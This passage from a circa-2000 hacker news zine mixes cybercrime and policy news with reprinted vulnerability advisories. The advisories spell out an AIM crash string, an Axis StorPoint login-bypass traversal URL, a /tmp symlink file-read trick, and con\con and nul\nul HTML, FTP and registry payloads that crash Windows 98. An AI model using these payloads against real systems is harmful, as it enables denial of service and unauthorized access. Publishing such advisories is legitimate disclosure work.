      using one of his victim's credit cards. That site has also been disabled. 

      To publicize his latest site, Curador said he has created an animated ad 
      banner and signed up for the Microsoft Banner Network, which will display 
      Curador's banner at participating Web sites. 

      "The banner says, 'Find out exactly what you can do if you have Microsoft 
      IIS Web server and ecommerce.' And if you click on it it'll take you right 
      to my site," said Curador. 

      Curador has admitted to targeting Windows NT systems in his previous 
      break-ins, using a known vulnerability in a feature called RDS, which was 
      first publicized by a security consultant who goes by the hacker nickname 
      of Rain Forest Puppy. But Curador now says he's turned his attention to 
      Unix servers, and claims to have captured encrypted password files that he 
      is attempting to crack. 

      "Unix is harder, but I want some more interesting targets. It's too easy 
      to do Windows and I can't be bothered any more." 

      Chris Davis, a security expert with Tyger Team Consultants in Ottawa, 
      Ontario, which has been retained by several of Curador's victim sites, 
      said the cracker's decision to target UNIX machines will make him easier 
      to track down. 

      "I'm laughing all the way to the court house, because Unix logs much 
      better than NT. Any time he sends a packet to a Unix machine it's going to 
      be logged somewhere, and that's going to make our job easier," said Davis. 

      Claiming to be a Webmaster for an ecommerce company, Curador has said his 
      goal is to wake up sites about their security vulnerabilities. But when 
      asked Wednesday whether he feels any remorse toward the people whose cards 
      he has stolen, Curador was unapologetic. 

      "It's just their tough luck. It's not my fault that the site (was 
      insecure). If I didn't do it, somebody else would have and not advertised 
      it," said Curador. 

      Davis admitted law enforcement agencies have been frustratingly slow in 
      investigating the case, but he is confident that Curador's crime spree 
      will soon come to an end. 

      "He's not as bright as he thinks he is. I could be underestimating him, 
      but I really doubt it. In a combined effort, we are far better at what we 
      do than this guy is, and I can't wait to see the look on this guy's face 
      when he gets arrested." 

      @HWA
      
149.0 HNN:Mar 10th:DDoS Attacks Used As Reason for National Court Order 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      Using the example of the recent distributed denial of
      service attacks, law enforcement representatives have
      been asking Congress for a national court order.
      Currently law enforcement must seek a separate court
      order in each state they track a single piece of data to
      get to its source. 

      TechWeb       
      http://www.techweb.com/wire/story/TWB20000308S0009
      
      Law Enforcers May Hunt Hackers
      With Federal Powers
      (03/08/00, 5:26 p.m. ET) By Mary Mosquera, TechWeb 

      WASHINGTON, D.C.-- The Clinton
      administration is thinking about letting law
      enforcement get national court orders to trace
      electronic communications to help hunt down
      hackers and other cyber criminals, a senior
      Justice Department official told lawmakers
      Wednesday. 

      "Obtaining court orders in multiple jurisdictions does not
      advance any reasonable privacy safeguard, yet it can be
      a substantial impediment to a fast-paced investigation,"
      said Deputy U.S. Attorney General Eric Holder. But it
      might be extremely helpful to provide a nationwide effect
      for trap and trace orders, he told the Senate Commerce
      committee looking at recent cyber attacks. 

      Any changes to existing law will be sensitive to privacy,
      which is spelled out in the Fourth Amendment and
      federal statutes, he told senators. 

      Sen. Ron Wyden (D-Ore.) said he was concerned about
      encroachment on citizens' privacy with expanded
      powers, adding "I worry that the cure could be worse
      than the ailment." 

      Investigators are subject to laws made for offline crime
      in tracking. An example is the case of the hackers
      responsible for the distributed denial-of-service attacks
      that temporarily halted popular Internet sites last month.
      Law enforcement must seek a separate court order in
      each state they track a single piece of data to get to its
      source. 

      "We are making progress in the investigation," Holder
      said of the denial-of-service crimes, but it is slow going. 

      Industry must lead to promote security, and government
      must make its own networks a model of security, but law
      enforcement also must be fully funded to acquire the
      technical expertise and staff, said Michael Vatis, director
      of the FBI's National Infrastructure Protection Center. 

      And while there are companies that prefer not to report a
      crime because of fear of public embarrassment due to a
      security lapse, the situation has improved, he said.
      "Companies increasingly realize that deterrence of crime
      depends on effective law enforcement, and the long-term
      interests of industry depend on establishing a good
      working relationship with government to prevent and
      investigate crime," Vatis said. 

      One initiative, InfraGard, has industry inform local FBI
      about intrusions using secure e-mail in both a sanitized
      and detailed format, the more descriptive one for the
      investigation and the more anonymous version for sharing
      about system vulnerabilities, he said. 

      The Internet has changed how communications are
      transmitted and magnified the problem of gathering
      evidence, Martha Stansell-Gamm, chief of the computer
      crime section at Justice, told reporters outside the
      hearing. "It's not an enhancement of our legal powers so
      much as sort of a return to status quo," she said. 

      "In the old days, there used to be one phone company, so
      if you got an order to trace a communication, all the
      information was contained by that entity, Ma Bell. It
      didn't matter if it were a local phone call or a national
      phone call from coast to coast. Now, one communication
      that we identify can be carried at the same time by many
      different phone companies, local and long distance,
      several different Internet service providers, and a cell
      phone provider or two," she said. 

      If a communication is carried by a number of carriers,
      one order can elicit only limited information. "But we
      have to get another order in the district where another
      company is located, and this is for the same
      communication," Stansell-Gamm said. 

      Other possible changes to laws covering computer crime
      may be an increase in the penalty and lowering the
      threshold at which damage is caused. 
      
      @HWA
      
150.0 HNN:Mar 10th:Voluntary Compliance With Security Practices Recommended 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Anonymous 
      Raj Reddy, co-chairman of the President's Information
      Technology Advisory Committee said while testifying
      before Congress that "Rather than leaving the Internet
      vulnerable because a few persons or organizations are
      careless or reckless, we should develop an information
      infrastructure that is not dependent on voluntary
      compliance with security practices and policies."
      (Voluntary compliance? Yeah, that gives me the warm
      fuzzies.) 

      Federal Computer Week       
      http://www.fcw.com/fcw/articles/2000/0306/web-3survive-03-09-00.asp
      
      

      A strong Internet is a secure Internet 

      BY Diane Frank 
      03/09/2000 

      The best way to secure the Internet is to make the Internet itself stronger, a
      member of the Presidents Information Technology Advisory Committee testified
      Wednesday before Congress. 

      Many security problems faced by agencies and industry stem from administrators not
      paying close enough attention to their systems, Raj Reddy, co-chairman of the
      PITAC and a computer science professor at Carnegie Mellon University, testified
      before the Senate Commerce, Science and Transportation Committees
      Communications Subcommittee. 

      "Rather than leaving the Internet vulnerable because a few persons or organizations
      are careless or reckless, we should develop an information infrastructure that is not
      dependent on voluntary compliance with security practices and policies," Reddy
      said, suggesting the creation of a "self-healing" network. 

      The concept of survivability  ensuring that services are available when needed and
      that information is delivered in a timely fashion  runs through many of the funding
      recommendations in the PITACs February 1999 report to the president, "Information
      Technology Research: Investing in Our Future." The PITAC is reviewing federal
      research plans and will issue new recommendations later this year. 

      In making the Internet more reliable, a self-healing network would provide security
      by catching problems as they happen, he said. 

      "A self-healing network would work similar to the human immune system," Reddy
      said. "It would constantly monitor the system, analyze what is in the system, and if
      it finds something wrong within the system, immediately begin actions to remedy the
      problem." 

      To develop the technology behind a more dependable Internet, Reddy urged the
      federal government to fund a national network test bed. Such an arrangement would
      be similar to the partnership created by several federal agencies and universities to
      develop and test the high-speed Next Generation Internet. 
      
      @HWA
      
151.0 HNN:Mar 10th:Chinese Gangs Blamed For Identity Theft 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      In testimony before the Senate Judiciary Subcommittee
      on Technology, Terrorism and Government, US Secret
      Service Special Agent Gregory Regan explained that
      organized Chinese fraud rings in the US and overseas
      are more and more likely to break into electronic
      databases to compromise credit and identity details. In
      1999 there were 1,147 cases of identity theft resulting
      in 644 convictions. 

      The UK Register      
      http://www.theregister.co.uk/000308-000016.html
      
      Posted 08/03/2000 2:20pm by Thomas C. Greene in Washington

      Chinese hackers turn to identity theft
      
      Organised Chinese fraud rings on the mainland and overseas are more likely to 
      hack databases to compromise credit and identity details than ply the more 
      traditional avenues of bribing bank employees favoured by their Nigerian 
      counterparts, a federal investigator claims. 
      
      "The Chinese gangs have moved into the electronic age where they're using 
      hacking techniques and Internet theft," US Secret Service Special Agent Gregory 
      Regan explained in testimony before the Senate Judiciary Subcommittee on 
      Technology, Terrorism and Government Information Tuesday. 
      
      Identity theft is an increasingly easy scam now that so much information is 
      available on line, Regan warned. "The Internet makes it unnecessary for 
      criminals to obtain identity documents," he said. 
      
      The Net is creating a "faceless society" where it's easy for an identity 
      fraudster, even one overseas, to open a credit account on line, sometimes with 
      nothing but his victim's name and social security number, Regan observed. 
      
      There were 1,147 cases of identity theft resulting in 644 convictions reported 
      in the US during 1999 alone. The US Social Security Administration reports that 
      over 81 percent of social security number misuse involves ID theft. Most 
      incidents are part of some larger, organised criminal enterprise. 
      
      Committee Chairman Jon Kyl (Republican, Arizona) sponsored the Identity Theft 
      and Assumption Deterrence Act, which became law in 1998. He convened Tuesday's 
      hearing to review the act's success and seek suggestions for its improvement. 
      
      The act requires the Federal Trade Commission to assist ID theft victims, which 
      it now does, in part, via a Web page here. 
      
      In spite of recent efforts to address the problem, victims often find that 
      recovering their identity is immensely more difficult than losing it. Witness 
      Maureen Mitchell recalled a seemingly endless series of difficulties in sorting 
      out her records after being vicitmised by fraudsters who ran up US $110,000 in 
      bogus charges in her and her husband's name. 
      
      Her suggestion for amending the bill would require merchants and credit agencies 
      to develop a single, unified protocol for victim notification. 
      
      "We had to submit handwriting samples to twenty different merchants; we had to 
      submit notarised documents and affidavits. It's like filling out your tax return 
      twenty times with twenty different sets of instructions," she observed dryly. 
      
      Having considerable personal experience with filling out American tax returns, 
      we can say without hesitation that the victim is being punished quite severely 
      here, and can only offer our hope that the criminals might suffer half as much. 
      
      @HWA
      
152.0 HNN:Mar 10th: U.S. Urges Internet Businesses to Help Fight Crime 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Turtlex 
      A report released by a working group led by Attorney
      General Janet Reno has said that Internet businesses
      need to cooperate with law enforcement to fight online
      crime. The 60-page report recommended more resources
      and training for law enforcement, urged greater
      promotion of cyber ethics and concluded that the
      existing laws should be adequate to protect against
      most online crimes. 

      Reuters - Yahoo
      http://dailynews.yahoo.com/h/nm/20000309/pl/tech_crime_1.html
      
      USA Today       
      http://www.usatoday.com/life/cyber/tech/cth524.htm
      
      Reuters'
      
      Thursday March 9 1:34 PM ET 

      U.S. Urges Internet Businesses to Help Fight Crime

      By James Vicini

      WASHINGTON (Reuters) - The Clinton administration said on Thursday that 
      Internet businesses, many of which have long been suspicious of government 
      regulation, need to cooperate with law enforcement to fight online crime.

      ``We are not asking businesses to be online cops. But we want them to be 
      online neighborhood watch groups,'' Commerce Secretary William Daley said 
      at a Justice Department news conference in releasing a report on unlawful       
      Internet conduct.

      The 60-page report recommended more resources and training for law 
      enforcement, urged greater promotion of cyberethics and concluded the 
      existing laws should be adequate to protect against most unlawful online 
      activities.

      The report by a working group led by Attorney General Janet Reno was 
      requested by President Clinton in August last year. The report was 
      essentially completed before last month's attacks that shut down some of 
      the Web's most       popular sites.

      The FBI has been investigating the attacks, but has yet to make any 
      arrests or bring any charges in what officials admit could be a lengthy 
      investigation.

      Daley said government and industry worked together on the Y2K problem. ``I 
      think if companies can help nail hackers who threaten our networks, it's 
      not just good for fighting crime, it's good for the future of 
      e-commerce,'' he said.

      Businesses ``can do for the Internet what neighbors do for each other 
      across the country, making communities safer by keeping an eye on each 
      other. I think they should share their experiences and technologies with 
      law       enforcement,'' he said.

      ``Businesses must step up their own efforts to make the Internet more 
      secure and not wait for cybercops to be expanded,'' Daley said.

      Reno acknowledged that some industry representatives had been concerned 
      about government regulation, but said the distrust was beginning to 
      vanish.

      ``I think there are still some -- perhaps it's a little like the wild West 
      in the development of America -- who say, 'Let not let government be 
      involved.' But there was also the marshals and Wyatt Earp and others who 
      brought some       order to it,'' she said.

      A leading civil liberties group said the report raised privacy concerns 
      and warned that it could result in expanded police powers.

      The American Civil Liberties Union said in a letter to Reno that the 
      report contained virtually no statistics on the extent of computer-related 
      crime or whether such activity posed a truly significant threat to the 
      nation.

      The ACLU objected to the report's description of anonymity of Internet 
      users as a ``thorny issue.'' The ACLU said, ``An end to Internet anonymity 
      would chill free expression in cyberspace and strip away one of the key 
      structural       privacy protections enjoyed by Internet users.''

      -=-
      
      USA Today;
      
      http://www.usatoday.com/life/cyber/tech/cth524.htm
      
      Cybercrime report controversial
      
      By M.J. Zuckerman and Kevin Johnson, USA TODAY 
      
      WASHINGTON -- Attorney General Janet Reno will release a report
      Thursday that seeks to expand the powers of law enforcement to conduct
      investigations in cyberspace. The report is already stirring controversy. 
      
      The report is the product of a presidential working group that was appointed
      last summer. It amounts to a legislative wish list from law enforcement
      agencies that claim to be stymied by abuses involving new technology.
      
      "They make the assertion that there is all this illegal conduct on the Internet
      that they must investigate, but nowhere in the report do they show any
      numbers or proof," says Emily Whitfield of the American Civil Liberties
      Union, which asked Reno in a letter to reject the report's conclusions.
      
      A draft of the report was released last week. It drew criticism from the civil
      liberties community as well as many in the Internet community.
      
      The 59-page draft report wants to loosen restrictions on several technical,
      legal procedures that would make it easier to identify and track individual
      Internet users. 
      
      "The report treats anonymity of Internet users as a 'thorny issue,' rather than
      a constitutional right," established in a Supreme Court case in 1995 that says
      the Constitution grants citizens the right to speak anonymously, the ACLU
      letter says. 
      
      @HWA
      
153.0 HNN:Mar 10th:Symantec Wants List Removed 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by knobdicker 
      Symantec is pressing the ISP that hosts the Peacefire
      anti-censorware organization to remove content linking
      to a decrypted list of the thousands of sites blocked by
      I-Gear, Symantec's Internet-filtering software.
      Symantec claims that posting the decrypting software
      and site information is a EULA violation, which raises
      legal issues about software reverse engineering similar
      to the MPAA lawsuit over DVD DeCSS. (Symantec
      should be thankful for all the free testing instead of
      trying to quash what they see as bad press.) 

      Wired
      http://www.wired.com/news/technology/0,1282,34842,00.html
      
      Peacefire       
      http://www.peacefire.com
      
      Censorware Exposed Again 
      by Chris Oakes 
      
      3:00 a.m. 9.Mar.2000 PST If you buy software to filter smut from the eyes 
      of Web-savvy children, you might expect it to catch a few innocent sites 
      in its electronic net. 

      But you may be surprised if over half of those sites being blocked are on 
      the list for no good reason. 

      That's what anti-"censorware" organization Peacefire says it proved when 
      it decrypted a list of the thousands of sites blocked by I-Gear, 
      Internet-filtering software from software firm Symantec. 

      "It shows how far people are willing to go in censoring people under 18 
      without applying critical examination of the tools," said Bennett 
      Haselton, 21, who founded Peacefire in 1996 to promote "free access for 
      the Net generation." 

      Since then, Peacefire has frequently made a point of poking holes in the 
      strategy of filtering Net content from youthful eyes in homes, libraries, 
      and schools. 

      "If [Symantec] hadn't taken time to pay an intern $10 for an hour's time 
      to do what I did, it means they didn't care enough to take the time to 
      improve their product," Haselton said. 

      What Haselton did was develop a software utility that could decrypt the 
      list of Web addresses blocked by I-Gear. Using the software himself, 
      Haselton examined the first 50 addresses blocked in the category of sites 
      ending in the .edu       domain. 

      Ostensibly blocked by I-Gear under "pornography," Haselton said the 
      majority of the blocked sites didn't begin to fit the description. 

      Symantec said that posting the decrypting software and site information 
      violates the end-user license agreement that comes with its software. The 
      company has asked the ISP that hosts Peacefire's Web pages to remove the 
      link to       the Symantec information. 

      That argument, if it went to court, could face the same legal questions of 
      "reverse engineering" coming into play in lawsuits over a utility that 
      enables allegedly illegal playback of DVD discs on Linux computers. 

      An overall analysis of the blocked sites produced a 76 percent error rate 
      for I-Gear, Haselton said. 

      These sites included a student site showing an experiment in which the 
      face of model Cindy Crawford morphed into the face of Claudia Schiffer, 
      and parts four and six of an academic analysis of the decline and fall of 
      the Roman       Empire. Another blocked page included a lengthy text 
      written entirely in Latin. 

      Peacefire deemed such sites "obvious errors," but also included in its 
      evaluation "marginal errors." Such sites included a satirical look at 
      growing up, entitled "How To Get By When You're Just As Dumb As Everyone 
      Else, But Uglier." The       site contained "some profanity," Peacefire 
      said, but was not "pornographic" as categorized by I-Gear. 

      
      Symantec Vice President Arthur Courville said Peacefire is acting 
      illegally. 

      "It was making part of our software available to the public in a manner 
      that it was not suppose to be made available," and that violates the 
      company's trade secrets and copyrights, said Courville, who also is 
      Symantec's general       counsel. 

      Neither Peacefire nor its ISP has acted on Symantec's request. Courville 
      wouldn't say whether the company planned to pursue the matter further. 

      In 1997, another filtering software company, Solid Oak, threatened legal 
      action against Peacefire for similar actions against its CyberSitter 
      software, but never followed up on the threat. 

      As for the allegedly error-ridden list exposed by Peacefire's actions, 
      Symantec said what should and shouldn't be included in a list is often a 
      matter of opinion. 

      "The I-Gear product is infinitely configurable, so the user can set that 
      to exclude everything on filter list[s], use portions, add or subtract 
      individual sites," Courville said. "So it's really up to the end user. 

      "Whenever dealing with a subject that covers as wide range of what we're 
      talking about here, there are areas that people are going to have 
      different opinions about." 

      The product has approximately two dozen subject categories, he said, 
      including crime, drugs, finance, sex, and nudity. 

      Liza Kessler, staff counsel at the Center for Democracy & Technology, said 
      that if its work is valid, Peacefire has once again proven the risk 
      parents and administrators take when they rely on software to monitor 
      their children's       Internet use. 

      "If consumers want this stuff they need to be able to make informed 
      choices about what they're getting," Kessler said. "If these companies are 
      not being truthful and someone exposes underlying truths of what is being 
      censored, that       provides a lot of additional information to 
      consumers." 

      It's not realistic for a company to expect the end user to review every 
      site for relevance to a blocking category, Kessler said. 

      Courville admitted that mistakes are "possible," as the list is processed 
      in a combination of human and automatic review. 

      As for the blocked Latin page, Courville speculated that the software's 
      language-translation capabilities may have found something in the Latin 
      text that qualified it under the pornographic categorization. 

      Haselton guessed that something may have been the high frequency of the 
      Latin word "cum." 
      
      @HWA
      
154.0 Janet Reno and her commie crusade into a police state...
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Here's the latest offal to be spewed from Janet's new proposal
      
      <SNIP>      
      
      Constitutional protections of the press are getting in the way of
      computer investigations, and need to be eliminated, says Janet Reno.
      The Privacy Protection Act of 1980 protects American journalists,
      scholars and writers by prohibiting all law enforcement agencies from
      searching for or seizing "any work product materials" or any related
      "documentary materials....possessed by a person....with a purpose to
      disseminate to the public a newspaper, book, broadcast, or other
      similar form of public communication."
      
      <SNIP>
      
      Snarfed from Packetstorm, who wisely had this on their main page,its
      important news people!, she wants essentially to (for example) have
      access to all my data, probably wants a camera in my john too.
      
      I don't live in the U.S and i'm glad, since its turning more communist
      every day, especially if we let people like Reno get their way.
      
      Fight back... there's plenty of causes to pick up 'arms' against, here
      is yet another attack on our privacy and freedom. - Ed
      
      @HWA
      
155.0 FLYING: Xwindows game leaves files readable in system
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://packetstorm.securify.com/
      March Archive
      
            
      Vulnerability: Any user can read any file in the system.
      title=Flying rev. 6.20
      author=Helmut Hoenig
      system=tested on Redhat 5.2, possibly others
      foundby=grandpae@nconnect.net (Grampa Elite)
      
      Overview:       Flying is a X-Windows program I have found installed on Redhat 
      5.2 that is actually a gateway for multiple games that Helmut wrote.  All of
      these games unfortunatly write to /tmp/logfile.txt .  Basicly all that you
      have to do is symlink logfile.txt to say /var/log/messages, and as soon as
      root runs his silly little game it overwrites logfile.txt with the file you
      symlinked it to, also it becomes owned by root and the symlink is turned
      off.  The big but is that the read bit is left on allowing you to read the
      tmp file.  Do I have anything better to do than find stupid tmp file holes
      in mostly unused games?  No not really.
      
      @HWA
      
156.0 AIM messenger DoS
      ~~~~~~~~~~~~~~~~~
      
      http://packetstorm.securify.com/
      March Archive
      
      
      
      As all Ascii-Symbols can be displayed in &#XXX; format, where XXX are
      numbers from 0-255, AIM seems not to check the XXX for higher values
      and some strings above 255 result in aim crashing completly or in part.
      
      E.g. the string &#770; will result in crashing the whole aim, but &#771;
      will crash only the instant message window (&#771; was only tested once
      by me).
      It will crash the AIM of the attacker too, because AIM displays the string
      in the attacker-Instant Message, so the attacker-AIM also tries to convert
      it and errors.
      
      There is already an unofficial fix available, which can be downloaded at my
      hompage: http://laugh.at/cruz
      The fix is an edited ate32.dll, which should be copied to the aim directory.
      With it, aim doesnt try to convert "&#XXX;"-type of strings anymore, a
      minimum drawback (note: with that fix, the attacker can use this exploit to
      crash other unfixed AIMs, but wont crash his/her own AIM).
      
      Affected versions: I tested this only on 3.5+ versions of AIM, but all other
      versions are most likely affected too.
      
      -cruz
      http://laugh.at/cruz
      
      @HWA
      
157.0 Bypassing authentication on Axis StorPoint CD;
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
      
      http://packetstorm.securify.com/
      March Archive
      

      From: "Vitek, Ian" <ian.vitek@INFOSEC.SE>
      Subject:      Infosec.20000229.axisstorpointcd.a
      X-To:         bugtraq@securityfocus.com
      To: BUGTRAQ@SECURITYFOCUS.COM
      
      Infosec Security Vulnerability Report
      No: Infosec.20000229.axisstorpointcd.a
      ======================================
      
      Vulnerability Summary
      ---------------------
      
      Problem: Bypassing authentication on Axis StorPoint CD;
                     By modifying an URL, outsiders can access
                     administrator URLs without entering username
                     and password
      
      Threat: Unauthorized access
      
      Platform: Axis StorPoint CD
                Axis StorPoint CD/T
                     (Software Version 4.13)
      
      Solution: Upgrade to Software Version 4.28
      
      
      Vulnerability Description
      -------------------------
      CDs are available from the URL http://server/cd/
      The configuration URL is:
      http://server/config/html/cnf_gi.htm
      This page is protected by a login and could contain very sensitive information.
      The login could be bypassed by the URL:
      http://server/cd/../config/html/cnf_gi.htm
      
      The server seems to check access permissions before URL conversion.
      
      Solution
      --------
      Infosec and Axis recommends customers to upgrade their StorPoint Software. The
      current version is 4.28 and is not vulnerable to this attack.
      http://www.se.axis.com/techsup/cdsrv/storpoint_cd/index.html
      
      Additional Information
      ----------------------
      The Axis StorPoint CD and StorPoint CD/T with Software Version 4.13 are old
      products with old software (from 1997). As Axis says:
      "Note that the development for StorPoint CD and CD/T has been discontinued from
      November 1999, only minor service releases will be available."
      Axis has tested their new products, Axis StorPoint CD E100 and StorPoint NAS
      100, and this vulnerability was not been found.
      
      Recognition
      -----------
      Infosec would like to thank Peter Berggren and Johan Diedrichs at Axis for their
      involvement with testing and supplying patch information.
      
      //Ian Vitek
      ian.vitek@infosec.se
      
      -------------------------------
      Infosec is a Swedish based tigerteam that has worked with computer-related
      security since 1982 and done penetration tests and technical revisions since
      1996. Infosec is now searching for co-workers. Call Blume on +46-8-6621070 for
      more information.
      
      
      @HWA      
      
      
158.0 Securax advisory, various BSOD (Windows) problems.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://packetstorm.securify.com/
      March Archive
      

      =====================================================================
      Securax-SA-01                                       Security Advisory
      belgian.networking.security                                     Dutch
      =====================================================================
      Topic:          Ms Windows '95/'98/SE will crash upon parsing special
                      crafted path-strings refering to device drivers.
      
      Announced:      2000-03-04
      Updated:        2000-03-05
      Affects:        Ms Windows'95, Ms Windows '98, Ms Windows '98 SE
      None affected:  Ms Windows NT Server/Workstation 4.0 (sp5/6)
      Obsoletes:      crash-ie.txt, win98-con.txt
      =====================================================================
      
      
               THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR 
        RESULTS.  THEREFORE WE CANNOT ENSURE YOU THE INFORMATION BELOW IS 
        100% CORRECT.  THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR
        NOTICE.
      
               PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING 
        THE BUG DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUQTRAQ.  
        THANK YOU,
      
      
      
      
      I.   Background
      
       Local and Remote users can crash Windows '98 systems using special 
       crafted path-strings that refer to device drivers being used.  
       Upon parsing this path the Ms Windows OS will crash leaving no 
       other option but to reboot the macine. With this all other running
       applications on the machine will stop responding.
      
       NOTE: This is not a bug in Internet Explorer, FTPd and other
       webserver software running Win95/98.  It is a bug in the Ms
       Windows kernel system, more specific in the handling of the device
       drivers specified in IO.SYS, causing this kernel meltdown.
      
      
      
      II.  Problem Description
      
       When the Microsoft Windows operating system is parsing a path that 
       is being crafted like "c:\[device]\[device]" it will halt, and crash 
       the entire operating system.  
      
       Four device drivers have been found to crash the system.  The CON,
       NUL, AUX, CLOCK$ and CONFIG$ are the two device drivers which are 
       known to crash.  Other devices as LPT[x]:, COM[x]: and PRN have not 
       been found to crash the system.  
      
       Making combinations as CON\NUL, NUL\CON, AUX\NUL, ... seems to 
       crash Ms Windows as well.
      
       Calling a path such as "C:\CON\[filename]" won't result in a crash
       but in an error-message.  Creating the map "CON", "CLOCK$", "AUX"
       "NUL" or "CONFIG$" will also result in a simple error-message 
       saying: ''creating that map isn't allowed''.
       
      
       DEVICE DRIVERS
       --------------
       These are specified in IO.SYS and date back from the early Ms Dos
       days.  Here is what I have found.  Here is a brief list;
      
        CLOCK$       - System clock
        CON          - Console; combination of keyboard and screen to 
                       handle input and output
        AUX or COM1  - First serial communicationport
        COMn         - Second, Third, ... communicationport
        LPT1 or PRN  - First parallel port
        NUL          - Dummy port, or the "null device" which we all
                       know under Linux as /dev/null.
        CONFIG$      - Unknown
      
      
      
       Any call made to a path consisting of "NUL" and "CON seems to
       crash routines made to the FAT32/VFAT, eventually trashing the 
       kernel.
      
       Therefore, it is possible to crash -any- other local and/or
       remote application as long as they parse the path-strings to
       call FAT32/VFAT routines in the kernel.  Mind you, we are -not- 
       sure this is the real reason, however there are strong evidences 
       to assume this is the case.
      
       So... To put it in laymen terms...  It seems that the Windows98
       kernel is going berserk upon processing paths that are made up
       of "old" (read: Ms Dos) device drivers.
      
      
      
      III.  Reproduction of the problem
      
        (1) When receiving images into HTML with a path refering to 
        [drive]:\con\con or [drive]:\nul\nul.  This will crash the Ms
        Windows '98 Operatin System when viewing this HTML.  This has
        been tested on Microsoft Outlook and Eudora Pro 4.2. Netscape
        Messenger seems not to crash.
      
             <HTML>
               <BODY>
                 <A HREF="c:\con\con">crashing IE</A>
                 <!-- or nul\nul, clock$\clock$ -->
                 <!-- or aux\aux, config$\config$ -->
               </BODY>
             </HTML>
      
        (2) When using GET /con/con or GET /nul/nul using WarFTPd on 
        any directory will also crash the operating system.  Other 
        FTPdaemons have not been tested.  So it's possible to remotely 
        crash Ms Windows '98 Operating Systems.  We expect that virtually 
        every FTPd running Windows '95/'98(se) can be crashed.
      
        (3) Inserting HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\_
        open with the value of c:\con\con "%1" %* or c:\nul\nul "%1" %* 
        will also crash the system.  Think of what Macro virii can do
        to your system now.
      
        (4) It's possible to crash any Windows '95/'98(SE) machine 
        running webserver software as Frontpage Webserver, ...  You can
        crash the machine by feeding an URL as 
      
            http://www.a_win98_site.be/nul/nul
      
        (5) Creating a HTML page with IMG tags or HREF tags refering to 
        the local "nul" path or the "con" path.
      
             <HTML>
               <BODY>
                 <IMG SRC="c:\con\con">
                 <!-- or nul\nul, clock$\clock$ -->
                 <!-- or aux\aux, config$\config$ -->
               </BODY>
             </HTML>
      
      
      
       There are much more methods in crashing the Ms Windows Operating 
       System but the essential part seems to be calling a path and file 
       both refering to a device name, either NUl, CON, AUX, CLOCK$ or
       CONFIG$, with the objective of getting data on the screen using 
       this path.  As you may notice, crashing the system can be done 
       remote or local.
      
      
       NETSCAPE - Netscape doesn't crash at first, because the string to
       call a path is changed to file:///D|/c:\nul\nul.  Upon entering
       c:\nul\nul in the URL without file:///D|/ you -do- crash Netscape
       and the Operating System.
       
      
      
      III. Impact
      
       This type of attack will render all applications useless, thus 
       leaving the system administrator no other option than rebooting the 
       system. Due to the wide range of options how to crash the Ms Windows 
       operating system, this is a severe bug.  However, Windows NT 
       systems don't seem to be vulnerable.
      
      
      
      IV.  Solution
       
       Ms Windows NT 4.0 and 2000 aren't affected as well.  We advice 
       Windows'98 users to either upgrade to the systems specified as 
       above, or not to follow html-links that refer to the device
       drivers specified as above.  Microsoft has been notified.  No
       official patch has been announced ( 2000-03-05 ).
      
       WORKAROUND: A simple byte hack could prevent this from happening
       as long as you don't use older Ms Dos programs making legitimate
       use of the device drivers.  By replacing all "NUL", "AUX", "CON"
       "CLOCK$" and "CONFIG$" device driver strings with random values
       or hex null values.  Mind you, upon hexediting these values, you
       must be aware that your system may become unstable.  We have
       created a patch that alters the strings, after the patch we were
       no longer able to type in any commando's on the Ms-Dos prompt.  The
       problem, however, was resolved.  Because of this side-effect, we
       are -not- releasing the patch.  It's up to you to decide if you
       want to change the bytes or not ( even with Ms Edit in binary 
       mode you can quickly patch your IO.SYS ).
      
      
      
      V.   Credits
      
       Initial "con" bug found in Internet Explorer by Suigien -*- Remote 
       Crashing using FTPd, HTTPd, EMail, Usenet by Zoa_Chien Path0s, 
       Necrite, Elias and ToSH -*- Byte hack IO.SYS workaround by Zoa_Chien
       -*- Advisory, IO.SYS exe/testing and aux/nul/clock$/config$ 
       detection by vorlon.
      
      
      
      
      
      =====================================================================
      For more information                                 info@securax.org
      Website                                        http://www.securax.org
      Advisories/Text                           http://www.securax.org/pers
      ---------------------------------------------------------------------
      
      @HWA              
      
      
      
159.0 How to be a Script Kiddy by DrHamstuh
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: DrHamstuh's HOW-TO for Linux
      
      Q:"How Do I Become A Hacker?"
      A: learn to code , install SunOS , get a SPARC , devote the rest of your
      life to computers and technology
      
      Q: well fuck that I'm lazy , how do i become a script kiddy?
      A: hmm I guess i can show you , whatever you do with this Info is your
      fault not mine...
      
      
      First things first , I am taking it you have Linux installed and a
      conection to the net.  If you are still on Windows* [TM] (C) (R)
      then please look into getting a linux CD-ROM from www.cheapbytes.com
      install linux , setup PPP [if in redhat just startx and use netcfg pussy]
      and come back and read this again ... thanx
      
      -=-=-=-=- t0p s3kr3t 0nly l1nux k1ddyZ c4n r3ad bel0w th1z l1n3 -=-=-=-=-
      /* top secret hamstuh encryption */
